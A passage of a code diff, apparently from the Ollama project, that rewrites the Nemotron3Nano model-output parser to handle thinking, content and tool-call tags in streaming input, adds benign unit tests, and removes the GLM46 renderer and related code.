-		p.state = Nemotron3NanoCollectingThinking
+		return tools
 	}

+	if prefill && lastMessage.Content != "" {
+		p.state = Nemotron3NanoCollectingContent
+		return tools
+	}
+
+	p.state = Nemotron3NanoCollectingThinking
 	return tools
 }

+type nemotronEvent interface {
+	isNemotronEvent()
+}
+
+type nemotronEventThinkingContent struct {
+	content string
+}
+
+type nemotronEventContent struct {
+	content string
+}
+
+type nemotronEventToolCall struct {
+	toolCall api.ToolCall
+}
+
+func (nemotronEventThinkingContent) isNemotronEvent() {}
+func (nemotronEventContent) isNemotronEvent()         {}
+func (nemotronEventToolCall) isNemotronEvent()        {}
+
 func (p *Nemotron3NanoParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) {
-	if p.state == Nemotron3NanoCollectingContent {
-		return p.toolParser.Add(s, done)
+	p.buffer.WriteString(s)
+	events := p.parseEvents()
+
+	var toolCalls []api.ToolCall
+	var contentSb strings.Builder
+	var thinkingSb strings.Builder
+	for _, event := range events {
+		switch event := event.(type) {
+		case nemotronEventToolCall:
+			toolCalls = append(toolCalls, event.toolCall)
+		case nemotronEventThinkingContent:
+			thinkingSb.WriteString(event.content)
+		case nemotronEventContent:
+			contentSb.WriteString(event.content)
+		}
 	}

-	if p.state == Nemotron3NanoSkipWhitespaceAfterThinking {
-		s = strings.TrimLeftFunc(s, unicode.IsSpace)
-		if s == "" {
-			return "", "", nil, nil
+	return contentSb.String(), thinkingSb.String(), toolCalls, nil
+}
+
+func (p *Nemotron3NanoParser) parseEvents() []nemotronEvent {
+	var all []nemotronEvent
+
+	keepLooping := true
+	for keepLooping {
+		var events []nemotronEvent
+		events, keepLooping = p.eat()
+		if len(events) > 0 {
+			all = append(all, events...)
+		}
+	}
+
+	return all
+}
+
+// emitWithPartialCheck extracts unambiguous content before a potential partial tag
+func (p *Nemotron3NanoParser) emitWithPartialCheck(bufStr, tag string) (unambiguous, ambiguous string) {
+	if overlapLen := overlap(bufStr, tag); overlapLen > 0 {
+		beforePartialTag := bufStr[:len(bufStr)-overlapLen]
+		trailingLen := trailingWhitespaceLen(beforePartialTag)
+		return bufStr[:len(beforePartialTag)-trailingLen], bufStr[len(beforePartialTag)-trailingLen:]
+	}
+	wsLen := trailingWhitespaceLen(bufStr)
+	return bufStr[:len(bufStr)-wsLen], bufStr[len(bufStr)-wsLen:]
+}
+
+func (p *Nemotron3NanoParser) eat() ([]nemotronEvent, bool) {
+	bufStr := p.buffer.String()
+	if bufStr == "" {
+		return nil, false
+	}
+
+	switch p.state {
+	case Nemotron3NanoCollectingThinking:
+		if strings.Contains(bufStr, nemotronThinkClose) {
+			split := strings.SplitN(bufStr, nemotronThinkClose, 2)
+			thinking := strings.TrimRightFunc(split[0], unicode.IsSpace)
+			p.buffer.Reset()
+			remainder := strings.TrimLeftFunc(split[1], unicode.IsSpace)
+			p.buffer.WriteString(remainder)
+			// Transition to whitespace-skipping state if buffer is empty,
+			// otherwise go directly to content collection
+			if remainder == "" {
+				p.state = Nemotron3NanoSkipWhitespaceAfterThinking
+			} else {
+				p.state = Nemotron3NanoCollectingContent
+			}
+			if thinking != "" {
+				return []nemotronEvent{nemotronEventThinkingContent{content: thinking}}, true
+			}
+			return nil, true
+		}
+		unambig, ambig := p.emitWithPartialCheck(bufStr, nemotronThinkClose)
+		p.buffer.Reset()
+		p.buffer.WriteString(ambig)
+		if unambig != "" {
+			return []nemotronEvent{nemotronEventThinkingContent{content: unambig}}, false
+		}
+		return nil, false
+
+	// We only want to skip whitespace between thinking and content
+	case Nemotron3NanoSkipWhitespaceAfterThinking:
+		bufStr = strings.TrimLeftFunc(bufStr, unicode.IsSpace)
+		p.buffer.Reset()
+		p.buffer.WriteString(bufStr)
+		if bufStr == "" {
+			return nil, false
 		}
 		p.state = Nemotron3NanoCollectingContent
-		return p.toolParser.Add(s, done)
-	}
+		return nil, true

-	// Nemotron3NanoCollectingThinking - buffer and look for end markers
-	p.buffer.WriteString(s)
-	bufStr := p.buffer.String()
-
-	// Look for end of thinking: </think> or <tool_call> (model may skip </think>)
-	thinkIdx := strings.Index(bufStr, nemotronThinkClose)
-	toolIdx := strings.Index(bufStr, nemotronToolCallOpen)
-
-	var endIdx int = -1
-	var remainder string
-
-	if thinkIdx != -1 && (toolIdx == -1 || thinkIdx < toolIdx) {
-		endIdx = thinkIdx
-		remainder = strings.TrimLeftFunc(bufStr[thinkIdx+len(nemotronThinkClose):], unicode.IsSpace)
-	} else if toolIdx != -1 {
-		endIdx = toolIdx
-		remainder = bufStr[toolIdx:] // Include <tool_call> tag
-	}
-
-	if endIdx != -1 {
-		thinking = strings.TrimRightFunc(bufStr[:endIdx], unicode.IsSpace)
-		p.buffer.Reset()
-
-		if remainder == "" {
-			p.state = Nemotron3NanoSkipWhitespaceAfterThinking
-		} else {
-			p.state = Nemotron3NanoCollectingContent
-			content, _, calls, err = p.toolParser.Add(remainder, done)
+	case Nemotron3NanoCollectingContent:
+		if strings.Contains(bufStr, nemotronToolCallOpen) {
+			split := strings.SplitN(bufStr, nemotronToolCallOpen, 2)
+			content := strings.TrimRightFunc(split[0], unicode.IsSpace)
+			p.buffer.Reset()
+			p.buffer.WriteString(split[1])
+			p.state = Nemotron3NanoCollectingToolCalls
+			if content != "" {
+				return []nemotronEvent{nemotronEventContent{content: content}}, true
+			}
+			return nil, true
 		}
-		return content, thinking, calls, err
+		unambig, ambig := p.emitWithPartialCheck(bufStr, nemotronToolCallOpen)
+		p.buffer.Reset()
+		p.buffer.WriteString(ambig)
+		if unambig != "" {
+			return []nemotronEvent{nemotronEventContent{content: unambig}}, false
+		}
+		return nil, false
+
+	case Nemotron3NanoCollectingToolCalls:
+		if strings.Contains(bufStr, nemotronToolCallClose) {
+			split := strings.SplitN(bufStr, nemotronToolCallClose, 2)
+			remaining := strings.TrimLeftFunc(split[1], unicode.IsSpace)
+			p.buffer.Reset()
+			p.buffer.WriteString(remaining)
+
+			var events []nemotronEvent
+			if tc, err := p.parseToolCall(split[0]); err == nil {
+				events = append(events, nemotronEventToolCall{toolCall: tc})
+			}
+
+			if !strings.Contains(remaining, nemotronToolCallOpen) {
+				p.state = Nemotron3NanoCollectingContent
+			}
+			return events, true
+		}
+		return nil, false
 	}

-	// No end marker - emit unambiguous thinking
-	thinking = p.emitThinking(bufStr)
-	return "", thinking, nil, nil
+	return nil, false
 }

-// emitThinking returns unambiguous thinking content, keeping potential partial tags in buffer
-func (p *Nemotron3NanoParser) emitThinking(bufStr string) string {
-	// Check for partial </think> or <tool_call> at end
-	thinkOverlap := overlap(bufStr, nemotronThinkClose)
-	toolOverlap := overlap(bufStr, nemotronToolCallOpen)
-	maxOverlap := max(thinkOverlap, toolOverlap)
+var (
+	nemotronFunctionRegex  = regexp.MustCompile(`<function=([^>]+)>`)
+	nemotronParameterRegex = regexp.MustCompile(`<parameter=([^>]+)>\n?([\s\S]*?)\n?</parameter>`)
+)

-	if maxOverlap > 0 {
-		unambiguous := bufStr[:len(bufStr)-maxOverlap]
-		unambiguous = strings.TrimRightFunc(unambiguous, unicode.IsSpace)
-		p.buffer.Reset()
-		p.buffer.WriteString(bufStr[len(bufStr)-maxOverlap:])
-		return unambiguous
+func (p *Nemotron3NanoParser) parseToolCall(content string) (api.ToolCall, error) {
+	toolCall := api.ToolCall{}
+
+	// Extract function name
+	fnMatch := nemotronFunctionRegex.FindStringSubmatch(content)
+	if len(fnMatch) < 2 {
+		return toolCall, nil
+	}
+	toolCall.Function.Name = fnMatch[1]
+
+	// Extract parameters
+	toolCall.Function.Arguments = api.NewToolCallFunctionArguments()
+	paramMatches := nemotronParameterRegex.FindAllStringSubmatch(content, -1)
+	for _, match := range paramMatches {
+		if len(match) >= 3 {
+			paramName := match[1]
+			paramValue := strings.TrimSpace(match[2])
+
+			// Try to parse as typed value based on tool definition
+			toolCall.Function.Arguments.Set(paramName, p.parseParamValue(paramName, paramValue))
+		}
 	}

-	// No partial tags - emit all but trailing whitespace
-	wsLen := trailingWhitespaceLen(bufStr)
-	if wsLen > 0 {
-		unambiguous := bufStr[:len(bufStr)-wsLen]
-		p.buffer.Reset()
-		p.buffer.WriteString(bufStr[len(bufStr)-wsLen:])
-		return unambiguous
-	}
-
-	// Nothing to hold back
-	p.buffer.Reset()
-	return bufStr
+	return toolCall, nil
+}
+
+func (p *Nemotron3NanoParser) parseParamValue(paramName string, raw string) any {
+	// Find the matching tool to get parameter type
+	var paramType api.PropertyType
+	for _, tool := range p.tools {
+		if tool.Function.Parameters.Properties != nil {
+			if prop, ok := tool.Function.Parameters.Properties.Get(paramName); ok {
+				paramType = prop.Type
+				break
+			}
+		}
+	}
+
+	return parseValue(raw, paramType)
 }
--- a/model/parsers/nemotron3nano_test.go
+++ b/model/parsers/nemotron3nano_test.go
@@ -8,8 +8,6 @@ import (
 	"github.com/ollama/ollama/api"
 )

-// TestNemotron3NanoParser tests Nemotron-specific behavior (thinking support).
-// Tool call parsing is tested in qwen3coder_test.go since Nemotron delegates to Qwen3CoderParser.
 func TestNemotron3NanoParser(t *testing.T) {
 	tests := []struct {
 		name             string
@@ -19,6 +17,18 @@ func TestNemotron3NanoParser(t *testing.T) {
 		expectedThinking string
 		expectedCalls    []api.ToolCall
 	}{
+		{
+			name:            "simple content - no thinking",
+			input:           "Hello, how can I help you?",
+			thinkValue:      nil,
+			expectedContent: "Hello, how can I help you?",
+		},
+		{
+			name:            "simple content - thinking disabled",
+			input:           "Hello, how can I help you?",
+			thinkValue:      &api.ThinkValue{Value: false},
+			expectedContent: "Hello, how can I help you?",
+		},
 		{
 			name:             "thinking then content",
 			input:            "Let me think about this...</think>\nHere is my answer.",
@@ -33,6 +43,69 @@ func TestNemotron3NanoParser(t *testing.T) {
 			expectedThinking: "Step 1: Analyze\nStep 2: Process\nStep 3: Conclude",
 			expectedContent:  "The answer is 42.",
 		},
+		{
+			name:       "simple tool call",
+			input:      "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>",
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "get_weather",
+						Arguments: testArgs(map[string]any{"city": "Paris"}),
+					},
+				},
+			},
+		},
+		{
+			name:            "content then tool call",
+			input:           "Let me check the weather.\n<tool_call>\n<function=get_weather>\n<parameter=city>\nNYC\n</parameter>\n</function>\n</tool_call>",
+			thinkValue:      nil,
+			expectedContent: "Let me check the weather.",
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "get_weather",
+						Arguments: testArgs(map[string]any{"city": "NYC"}),
+					},
+				},
+			},
+		},
+		{
+			name:       "tool call with multiple parameters",
+			input:      "<tool_call>\n<function=book_flight>\n<parameter=from>\nSFO\n</parameter>\n<parameter=to>\nNYC\n</parameter>\n</function>\n</tool_call>",
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name: "book_flight",
+						Arguments: testArgs(map[string]any{
+							"from": "SFO",
+							"to":   "NYC",
+						}),
+					},
+				},
+			},
+		},
+		{
+			name: "multiple tool calls",
+			input: "<tool_call>\n<function=get_weather>\n<parameter=city>\nSan Francisco\n</parameter>\n</function>\n</tool_call>\n" +
+				"<tool_call>\n<function=get_weather>\n<parameter=city>\nNew York\n</parameter>\n</function>\n</tool_call>",
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "get_weather",
+						Arguments: testArgs(map[string]any{"city": "San Francisco"}),
+					},
+				},
+				{
+					Function: api.ToolCallFunction{
+						Name:      "get_weather",
+						Arguments: testArgs(map[string]any{"city": "New York"}),
+					},
+				},
+			},
+		},
 		{
 			name:             "thinking then tool call",
 			input:            "I should check the weather...</think>\n<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>",
@@ -62,6 +135,19 @@ func TestNemotron3NanoParser(t *testing.T) {
 				},
 			},
 		},
+		{
+			name:       "tool call with multiline parameter value",
+			input:      "<tool_call>\n<function=create_note>\n<parameter=content>\nLine 1\nLine 2\nLine 3\n</parameter>\n</function>\n</tool_call>",
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "create_note",
+						Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}),
+					},
+				},
+			},
+		},
 		{
 			name:             "empty thinking block - immediate close",
 			input:            "</think>\nHere is my answer.",
@@ -75,6 +161,18 @@ func TestNemotron3NanoParser(t *testing.T) {
 			thinkValue:      &api.ThinkValue{Value: false},
 			expectedContent: "</think>\nSome content after spurious tag.",
 		},
+		{
+			name:          "tool call with no function name - returns empty tool call",
+			input:         "<tool_call>\n<function=>\n</function>\n</tool_call>",
+			thinkValue:    nil,
+			expectedCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "", Arguments: api.NewToolCallFunctionArguments()}}},
+		},
+		{
+			name:            "content with newlines preserved",
+			input:           "Line 1\n\nLine 2\n\n\nLine 3",
+			thinkValue:      nil,
+			expectedContent: "Line 1\n\nLine 2\n\n\nLine 3",
+		},
 		{
 			name:             "thinking with only whitespace after close tag",
 			input:            "My thoughts...</think>   \n\t\n   Content here.",
@@ -82,6 +180,25 @@ func TestNemotron3NanoParser(t *testing.T) {
 			expectedThinking: "My thoughts...",
 			expectedContent:  "Content here.",
 		},
+		{
+			name:            "unicode content",
+			input:           "Hello 世界! 🌍 Ñoño",
+			thinkValue:      nil,
+			expectedContent: "Hello 世界! 🌍 Ñoño",
+		},
+		{
+			name:       "tool call with numeric parameter",
+			input:      "<tool_call>\n<function=set_temp>\n<parameter=value>\n42\n</parameter>\n</function>\n</tool_call>",
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "set_temp",
+						Arguments: testArgs(map[string]any{"value": "42"}),
+					},
+				},
+			},
+		},
 	}

 	for _, tt := range tests {
@@ -116,8 +233,6 @@ func TestNemotron3NanoParser(t *testing.T) {
 	}
 }

-// TestNemotron3NanoParser_Streaming tests streaming behavior for thinking support.
-// Tool call streaming is tested in qwen3coder_test.go.
 func TestNemotron3NanoParser_Streaming(t *testing.T) {
 	tests := []struct {
 		name             string
@@ -127,6 +242,18 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
 		expectedThinking string
 		expectedCalls    []api.ToolCall
 	}{
+		{
+			name:            "streaming content character by character",
+			chunks:          []string{"H", "e", "l", "l", "o", ",", " ", "w", "o", "r", "l", "d", "!"},
+			thinkValue:      nil,
+			expectedContent: "Hello, world!",
+		},
+		{
+			name:            "streaming content small tokens",
+			chunks:          []string{"Hel", "lo", ", ", "how ", "can", " I", " help", " you", " today", "?"},
+			thinkValue:      nil,
+			expectedContent: "Hello, how can I help you today?",
+		},
 		{
 			name:             "streaming thinking then content - granular",
 			chunks:           []string{"Let", " me", " th", "ink", " about", " this", "...", "<", "/", "think", ">", "\n", "Here", " is", " my", " answer", "."},
@@ -141,6 +268,45 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
 			expectedThinking: "Step 1: Analyze\nStep 2: Process",
 			expectedContent:  "The answer.",
 		},
+		{
+			name:       "streaming tool call - highly granular",
+			chunks:     []string{"<", "tool", "_", "call", ">", "\n", "<", "func", "tion", "=", "get", "_", "weather", ">", "\n", "<", "param", "eter", "=", "city", ">", "\n", "Par", "is", "\n", "</", "param", "eter", ">", "\n", "</", "func", "tion", ">", "\n", "</", "tool", "_", "call", ">"},
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "get_weather",
+						Arguments: testArgs(map[string]any{"city": "Paris"}),
+					},
+				},
+			},
+		},
+		{
+			name:            "streaming content then tool call - granular",
+			chunks:          []string{"Let", " me", " check", " the", " weather", ".", "\n<", "tool_call", ">", "\n", "<function=", "get_weather", ">", "\n", "<parameter=", "city", ">", "\n", "NYC", "\n", "</parameter>", "\n", "</function>", "\n", "</tool_call>"},
+			thinkValue:      nil,
+			expectedContent: "Let me check the weather.",
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "get_weather",
+						Arguments: testArgs(map[string]any{"city": "NYC"}),
+					},
+				},
+			},
+		},
+		{
+			name:   "tool call tag split character by character",
+			chunks: []string{"<", "t", "o", "o", "l", "_", "c", "a", "l", "l", ">", "\n", "<", "f", "u", "n", "c", "t", "i", "o", "n", "=", "t", "e", "s", "t", ">", "\n", "<", "/", "f", "u", "n", "c", "t", "i", "o", "n", ">", "\n", "<", "/", "t", "o", "o", "l", "_", "c", "a", "l", "l", ">"},
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "test",
+						Arguments: api.NewToolCallFunctionArguments(),
+					},
+				},
+			},
+		},
 		{
 			name:             "thinking close tag split character by character",
 			chunks:           []string{"I", "'", "m", " ", "t", "h", "i", "n", "k", "i", "n", "g", ".", ".", ".", "<", "/", "t", "h", "i", "n", "k", ">", "\n", "D", "o", "n", "e", "!"},
@@ -155,6 +321,22 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
 			expectedThinking: "Thinking...",
 			expectedContent:  "Content here.",
 		},
+		{
+			name:       "tool call with multiple parameters - streaming",
+			chunks:     []string{"<tool_", "call>\n", "<function", "=book_", "flight>", "\n<para", "meter=", "from>\n", "SFO\n", "</param", "eter>", "\n<param", "eter=to", ">\nNYC", "\n</para", "meter>", "\n</func", "tion>\n", "</tool_", "call>"},
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name: "book_flight",
+						Arguments: testArgs(map[string]any{
+							"from": "SFO",
+							"to":   "NYC",
+						}),
+					},
+				},
+			},
+		},
 		{
 			name:             "thinking then content then tool call - streaming",
 			chunks:           []string{"Ana", "lyzing", " your", " request", "...", "</", "think", ">\n", "I'll", " check", " that", " for", " you", ".", "\n", "<tool", "_call", ">\n", "<function", "=search", ">\n", "<parameter", "=query", ">\n", "test", " query", "\n</", "parameter", ">\n", "</function", ">\n", "</tool", "_call", ">"},
@@ -170,6 +352,45 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
 				},
 			},
 		},
+		{
+			name: "multiple tool calls - streaming",
+			chunks: []string{
+				"<tool_call>", "\n", "<function=", "get_weather>", "\n",
+				"<parameter=", "city>\n", "San Fran", "cisco\n", "</parameter>", "\n",
+				"</function>", "\n", "</tool_call>", "\n",
+				"<tool_", "call>\n", "<function", "=get_weather", ">\n",
+				"<param", "eter=city", ">\nNew", " York\n", "</parameter>\n",
+				"</function>\n", "</tool_call>",
+			},
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "get_weather",
+						Arguments: testArgs(map[string]any{"city": "San Francisco"}),
+					},
+				},
+				{
+					Function: api.ToolCallFunction{
+						Name:      "get_weather",
+						Arguments: testArgs(map[string]any{"city": "New York"}),
+					},
+				},
+			},
+		},
+		{
+			name:       "tool call with multiline parameter - streaming",
+			chunks:     []string{"<tool_call>\n", "<function=", "create_note>\n", "<parameter=", "content>\n", "Line 1", "\nLine", " 2\n", "Line 3", "\n</parameter>\n", "</function>\n", "</tool_call>"},
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "create_note",
+						Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}),
+					},
+				},
+			},
+		},
 		{
 			name:             "empty thinking block",
 			chunks:           []string{"</think>", "\n", "Just content."},
@@ -177,6 +398,12 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
 			expectedThinking: "",
 			expectedContent:  "Just content.",
 		},
+		{
+			name:            "empty input chunks interspersed",
+			chunks:          []string{"Hello", "", " ", "", "world", "", "!"},
+			thinkValue:      nil,
+			expectedContent: "Hello world!",
+		},
 		{
 			name:             "tool call immediately after think close - no content",
 			chunks:           []string{"Analyzing...", "</think>", "\n", "<tool_call>", "\n<function=test>\n</function>\n", "</tool_call>"},
@@ -191,6 +418,25 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
 				},
 			},
 		},
+		{
+			name:       "tool call with empty parameter value",
+			chunks:     []string{"<tool_call>\n<function=test>\n<parameter=name>\n", "\n</parameter>\n</function>\n</tool_call>"},
+			thinkValue: nil,
+			expectedCalls: []api.ToolCall{
+				{
+					Function: api.ToolCallFunction{
+						Name:      "test",
+						Arguments: testArgs(map[string]any{"name": ""}),
+					},
+				},
+			},
+		},
+		{
+			name:            "partial tool call tag at end - buffered",
+			chunks:          []string{"Here's some content", "<tool"},
+			thinkValue:      nil,
+			expectedContent: "Here's some content",
+		},
 	}

 	for _, tt := range tests {
@@ -326,65 +572,3 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
 		t.Errorf("calls mismatch (-got +want):\n%s", diff)
 	}
 }
-
-// TestNemotron3NanoParser_ToolCallWithoutThinkClose tests the case where thinking is enabled
-// but the model outputs content + tool call WITHOUT the </think> tag.
-// The parser should still parse the tool call (content before is treated as thinking).
-func TestNemotron3NanoParser_ToolCallWithoutThinkClose(t *testing.T) {
-	chunks := []string{
-		"Let", " me", " analyze", " this", ".", "\n",
-		"<tool_call>", "\n",
-		"<function=get_weather>", "\n",
-		"<parameter=city>", "Paris", "</parameter>", "\n",
-		"</function>", "\n",
-		"</tool_call>",
-	}
-
-	p := &Nemotron3NanoParser{}
-	p.Init(nil, nil, &api.ThinkValue{Value: true}) // thinking ENABLED but model doesn't output </think>
-
-	var allContent string
-	var allThinking string
-	var allCalls []api.ToolCall
-
-	for _, chunk := range chunks {
-		content, thinking, calls, err := p.Add(chunk, false)
-		if err != nil {
-			t.Fatalf("unexpected error: %v", err)
-		}
-		allContent += content
-		allThinking += thinking
-		allCalls = append(allCalls, calls...)
-	}
-
-	// Drain
-	content, thinking, calls, err := p.Add("", true)
-	if err != nil {
-		t.Fatalf("unexpected error on done: %v", err)
-	}
-	allContent += content
-	allThinking += thinking
-	allCalls = append(allCalls, calls...)
-
-	// The parser was in thinking mode, so text before <tool_call> is emitted as thinking.
-	expectedThinking := "Let me analyze this."
-
-	expectedCalls := []api.ToolCall{
-		{
-			Function: api.ToolCallFunction{
-				Name:      "get_weather",
-				Arguments: testArgs(map[string]any{"city": "Paris"}),
-			},
-		},
-	}
-
-	if allContent != "" {
-		t.Errorf("expected no content (text was streamed as thinking), got: %q", allContent)
-	}
-	if diff := cmp.Diff(allThinking, expectedThinking); diff != "" {
-		t.Errorf("thinking mismatch (-got +want):\n%s", diff)
-	}
-	if diff := cmp.Diff(allCalls, expectedCalls, argsComparer); diff != "" {
-		t.Errorf("calls mismatch (-got +want):\n%s", diff)
-	}
-}
--- a/model/parsers/parsers.go
+++ b/model/parsers/parsers.go
@@ -68,8 +68,6 @@ func ParserForName(name string) Parser {
 		return &Nemotron3NanoParser{}
 	case "functiongemma":
 		return &FunctionGemmaParser{}
-	case "glm-4.7":
-		return &GLM47Parser{}
 	default:
 		return nil
 	}
--- a/model/parsers/qwen3coder_test.go
+++ b/model/parsers/qwen3coder_test.go
@@ -91,37 +91,6 @@ func TestQwenParserStreaming(t *testing.T) {
 				},
 			},
 		},
-		{
-			desc: "tool call tags split character by character",
-			steps: []step{
-				{input: "<", wantEvents: []qwenEvent{}},
-				{input: "t", wantEvents: []qwenEvent{}},
-				{input: "o", wantEvents: []qwenEvent{}},
-				{input: "o", wantEvents: []qwenEvent{}},
-				{input: "l", wantEvents: []qwenEvent{}},
-				{input: "_", wantEvents: []qwenEvent{}},
-				{input: "c", wantEvents: []qwenEvent{}},
-				{input: "a", wantEvents: []qwenEvent{}},
-				{input: "l", wantEvents: []qwenEvent{}},
-				{input: "l", wantEvents: []qwenEvent{}},
-				{input: ">", wantEvents: []qwenEvent{}},
-				{input: "a", wantEvents: []qwenEvent{}},
-				{input: "b", wantEvents: []qwenEvent{}},
-				{input: "c", wantEvents: []qwenEvent{}},
-				{input: "<", wantEvents: []qwenEvent{}},
-				{input: "/", wantEvents: []qwenEvent{}},
-				{input: "t", wantEvents: []qwenEvent{}},
-				{input: "o", wantEvents: []qwenEvent{}},
-				{input: "o", wantEvents: []qwenEvent{}},
-				{input: "l", wantEvents: []qwenEvent{}},
-				{input: "_", wantEvents: []qwenEvent{}},
-				{input: "c", wantEvents: []qwenEvent{}},
-				{input: "a", wantEvents: []qwenEvent{}},
-				{input: "l", wantEvents: []qwenEvent{}},
-				{input: "l", wantEvents: []qwenEvent{}},
-				{input: ">", wantEvents: []qwenEvent{qwenEventRawToolCall{raw: "abc"}}},
-			},
-		},
 		{
 			desc: "trailing whitespace between content and tool call",
 			steps: []step{
--- a/model/parsers/testhelpers_test.go
+++ b/model/parsers/testhelpers_test.go
@@ -96,11 +96,3 @@ func testArgs(m map[string]any) api.ToolCallFunctionArguments {
 	}
 	return args
 }
-
-func args(s string) api.ToolCallFunctionArguments {
-	var result api.ToolCallFunctionArguments
-	if err := json.Unmarshal([]byte(s), &result); err != nil {
-		panic("invalid JSON in args(): " + err.Error())
-	}
-	return result
-}
--- a/model/renderers/glm46.go
+++ b/model/renderers/glm46.go
@@ -1,110 +0,0 @@
-package renderers
-
-import (
-	"encoding/json"
-	"fmt"
-	"strings"
-
-	"github.com/ollama/ollama/api"
-)
-
-type GLM46Renderer struct{}
-
-func (r *GLM46Renderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) {
-	var sb strings.Builder
-
-	sb.WriteString("[gMASK]<sop>")
-
-	var lastUserIndex int
-	for i, message := range messages {
-		if message.Role == "user" {
-			lastUserIndex = i
-		}
-	}
-
-	if len(tools) > 0 {
-		sb.WriteString("<|system|>\n")
-		sb.WriteString("# Tools\n\n")
-		sb.WriteString("You may call one or more functions to assist with the user query.\n\n")
-		sb.WriteString("You are provided with function signatures within <tools></tools> XML tags:\n")
-		sb.WriteString("<tools>\n")
-		for _, tool := range tools {
-			d, _ := json.Marshal(tool)
-			sb.WriteString(string(d) + "\n")
-		}
-		sb.WriteString("</tools>\n\n")
-		sb.WriteString("For each function call, output the function name and arguments within the following XML format:\n")
-		sb.WriteString("<tool_call>{function-name}\n")
-		sb.WriteString("<arg_key>{arg-key-1}</arg_key>\n")
-		sb.WriteString("<arg_value>{arg-value-1}</arg_value>\n")
-		sb.WriteString("<arg_key>{arg-key-2}</arg_key>\n")
-		sb.WriteString("<arg_value>{arg-value-2}</arg_value>\n")
-		sb.WriteString("...\n")
-		sb.WriteString("</tool_call>")
-	}
-
-	for i, message := range messages {
-		switch message.Role {
-		case "user":
-			sb.WriteString("<|user|>\n")
-			sb.WriteString(message.Content)
-			if thinkValue != nil && !thinkValue.Bool() && !strings.HasSuffix(message.Content, "/nothink") {
-				sb.WriteString("/nothink")
-			}
-		case "assistant":
-			sb.WriteString("<|assistant|>")
-			if i > lastUserIndex {
-				if message.Thinking != "" {
-					sb.WriteString("\n<think>" + message.Thinking + "</think>")
-				} else {
-					sb.WriteString("\n<think></think>")
-				}
-			}
-			if message.Content != "" {
-				sb.WriteString("\n" + message.Content)
-			}
-			if len(message.ToolCalls) > 0 {
-				for _, toolCall := range message.ToolCalls {
-					sb.WriteString("\n<tool_call>" + toolCall.Function.Name + "\n")
-					for key, value := range toolCall.Function.Arguments.All() {
-						sb.WriteString("<arg_key>" + key + "</arg_key>\n")
-
-						var valueStr string
-						if str, ok := value.(string); ok {
-							valueStr = str
-						} else {
-							jsonBytes, err := json.Marshal(value)
-							if err != nil {
-								valueStr = fmt.Sprintf("%v", value)
-							} else {
-								valueStr = string(jsonBytes)
-							}
-						}
-
-						sb.WriteString("<arg_value>" + valueStr + "</arg_value>\n")
-					}
-
-					sb.WriteString("</tool_call>")
-				}
-			}
-		case "tool":
-			if i == 0 || messages[i-1].Role != "tool" {
-				sb.WriteString("<|observation|>")
-			}
-			sb.WriteString("\n<tool_response>\n")
-			sb.WriteString(message.Content)
-			sb.WriteString("\n</tool_response>")
-		case "system":
-			sb.WriteString("<|system|>\n")
-			sb.WriteString(message.Content)
-		}
-	}
-
-	// Add generation prompt
-	sb.WriteString("<|assistant|>")
-	if thinkValue != nil && !thinkValue.Bool() {
-		sb.WriteString("\n<think></think>\n")
-	}
-
-	return sb.String(), nil
-}
--- a/model/renderers/glm46_test.go
+++ b/model/renderers/glm46_test.go
@@ -1,223 +0,0 @@
-package renderers
-
-import (
-	"testing"
-
-	"github.com/google/go-cmp/cmp"
-	"github.com/ollama/ollama/api"
-)
-
-func TestGLM46Renderer(t *testing.T) {
-	tests := []struct {
-		name       string
-		messages   []api.Message
-		tools      []api.Tool
-		thinkValue *api.ThinkValue
-		expected   string
-		skip       string
-	}{
-		{
-			name: "basic",
-			messages: []api.Message{
-				{Role: "user", Content: "Hello, how are you?"},
-			},
-			expected: `[gMASK]<sop><|user|>
-Hello, how are you?<|assistant|>`,
-		},
-		{
-			name: "basic with system message",
-			messages: []api.Message{
-				{Role: "system", Content: "You are a helpful assistant."},
-				{Role: "user", Content: "Hello, how are you?"},
-			},
-			expected: `[gMASK]<sop><|system|>
-You are a helpful assistant.<|user|>
-Hello, how are you?<|assistant|>`,
-		},
-		{
-			name: "basic with user assistant user",
-			messages: []api.Message{
-				{Role: "user", Content: "What is the capital of France?"},
-				{Role: "assistant", Thinking: "Let me analyze the request...", Content: "The capital of France is Paris."},
-				{Role: "user", Content: "Fantastic!"},
-			},
-			expected: `[gMASK]<sop><|user|>
-What is the capital of France?<|assistant|>
-The capital of France is Paris.<|user|>
-Fantastic!<|assistant|>`,
-		},
-		{
-			skip: "tool call ordering not guaranteed yet",
